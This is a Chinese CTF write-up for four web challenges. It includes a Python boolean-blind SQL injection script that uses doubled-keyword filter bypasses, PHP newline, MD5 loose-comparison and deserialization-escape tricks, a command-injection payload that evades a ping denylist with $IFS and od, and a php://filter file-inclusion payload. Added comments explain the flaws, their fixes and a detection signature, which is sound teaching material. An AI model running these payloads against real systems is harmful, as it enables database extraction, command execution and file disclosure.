Eazy_sqli

双写绕过+布尔盲注,直接上脚本:

import requests

# Challenge target from the writeup. The response body is the only oracle
# the loop reads, so this is a classic boolean-based blind extraction.
url = 'http://218.197.154.9:10011/login.php'
flag = ''
# One character position per outer iteration; 300 is just a cap on the
# extracted length, the break below is the real terminator.
for i in range(1,300):
    print(i)
    # Binary search over the printable ASCII range [32, 128).
    low = 32
    high =128
    mid = (low+high)//2
    while(low<high):
        #payload = "1' oorr ascii(substr((selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()),{},1))>{}#".format(i,mid)
        #payload = "1' oorr ascii(substr((selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='f1ag_y0u_wi1l_n3ver_kn0w'),{},1))>{}#".format(i, mid)
        # Keywords are written doubled ("oorr", "seselectlect") because, per the
        # writeup, the target strips each banned keyword once instead of rejecting
        # the request. A filter that deletes rather than refuses is bypassable this
        # way; parameterized queries are the actual fix on the server side.
        payload = "1' oorr ascii(substr((seselectlect f111114g frfromom f1ag_y0u_wi1l_n3ver_kn0w),{},1))>{}#".format(i,mid)
        data = {
            "user":payload,
            "pass":"l"
        }
        r = requests.post(url=url,data=data)
        # Oracle: the login outcome differs depending on whether the injected
        # comparison held. Detection note for defenders: hundreds of POSTs to the
        # same endpoint whose bodies differ only in two integers is an easy signature.
        if "Login success!" in r.text:
            low = mid+1
        else:
            high = mid
        mid =(low+high)//2
    # Heuristic end-of-data: a search that collapses to either edge of the
    # range is taken to mean there is no further character.
    if(mid ==32 or mid ==127):
        break
    flag +=chr(mid)
    print(flag)

ezphp

源码:

<?php
error_reporting(0);
highlight_file(__file__);
// Both values are attacker-controlled query parameters.
$string_1 = $_GET['str1'];
$string_2 = $_GET['str2'];

//1st
// num must differ from the literal '23333' yet still satisfy /^23333$/.
// In PCRE `$` also matches just before a trailing newline, so the two checks
// are not equivalent; anchoring with \z (or the D modifier) would make them so.
if($_GET['num'] !== '23333' && preg_match('/^23333$/', $_GET['num'])){
    echo '1st ok'."<br>";
}
else{
    die('会代码审计嘛23333');
}


//2nd
// Both `!=` and `==` below are loose comparisons, so two digests that merely
// look numeric can compare equal without being the same bytes. md5() returns
// lowercase hex, so of 'pggnb' only 'b' can ever be substituted by strtr().
// `!==`/`===` would make the digest comparison byte-wise.
if(is_numeric($string_1)){
    $md5_1 = md5($string_1);
    $md5_2 = md5($string_2);

    if($md5_1 != $md5_2){
        $a = strtr($md5_1, 'pggnb', '12345');
        $b = strtr($md5_2, 'pggnb', '12345');
        if($a == $b){
            echo '2nd ok'."<br>";
        }
        else{
            die("can u give me the right str???");
        }
    } 
    else{
        die("no!!!!!!!!");
    }
}
else{
    die('is str1 numeric??????');
}

//3nd
// Replaces every 'x' with 'yy', growing the string by one byte per match.
// Applied to already-serialized data (see below) this desynchronizes the
// s:N:"..." length prefixes from their payloads.
function filter($string){
    return preg_replace('/x/', 'yy', $string);
}

// $username is attacker-controlled; $password is a fixed constant.
$username = $_POST['username'];

$password = "aaaaa";
$user = array($username, $password);

// filter() runs on the serialized array, so any 'x' in $username lengthens the
// encoded string after its length prefix was written; unserialize() then parses
// attacker-supplied bytes as structure. Filtering before serialize(), or not
// unserializing user-influenced data at all, removes the problem.
$r = filter(serialize($user));
if(unserialize($r)[1] == "123456"){
    echo file_get_contents('flag.php');
}

num用%0a绕过(PCRE 的 `$` 也能匹配结尾换行符之前的位置),MD5用php循环找一下(我水平低):

<?php
// Searches for a str1 that passes the 2nd check above against a fixed str2:
// the raw digests must differ (loose `!=`) yet compare equal (loose `==`) after
// strtr(). The loop has no upper bound, so it ends only when a match is found;
// md5($string_2) and $b are loop-invariant.
$string_2='240610708';
for($string_1=100000;;$string_1++)
{
    $md5_1 = md5($string_1);
    $md5_2 = md5($string_2);
    if($md5_1 != $md5_2) {
        $a = strtr($md5_1, 'pggnb', '12345');
        $b = strtr($md5_2, 'pggnb', '12345');
        if ($a == $b) {
            echo $string_1 . "<br>";
            break;
        }
    }
}

成功找到之后进行下一步,参考《详解PHP反序列化中的字符逃逸》—peri0d

反序列化字符逃逸payload:leukxxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}

ezcmd

源码:

<?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  // Denylist of shell metacharacters. The first pattern stops its control-character
  // class at 0x1f while the second (only echoed) extends it to 0x20; the space
  // check is done separately below.
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("no space!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("no flag");
  } else if(preg_match("/tac|rm|echo|cat|nl|less|more|tail|head/", $ip)){
    die("cat't read flag");
  }
  // Unescaped concatenation into a shell command: any metacharacter the denylist
  // misses reaches the shell. Validating with filter_var($ip, FILTER_VALIDATE_IP)
  // and wrapping the value in escapeshellarg() is the robust alternative to
  // maintaining a denylist.
  $a = shell_exec("ping -c 4 ".$ip); 
  echo "<pre>";
  print_r($a);
}
highlight_file(__FILE__);

?>

没啥好说的,就比pingpingping多过滤了cat rm这些,用od -c绕过去(我并不知道预期是啥,但这样能做出来,就是flag出来之后格式要调比较麻烦),直接上payload:?ip=127.0.0.1;b=g;od$IFS$1-c$IFS$1fla$b.php

ezinclude

脑洞题。。。。。。在thankyou.php,直接上payload:?file=php://filter/read=convert.base64-encode/resource=flag.php

 

 

 
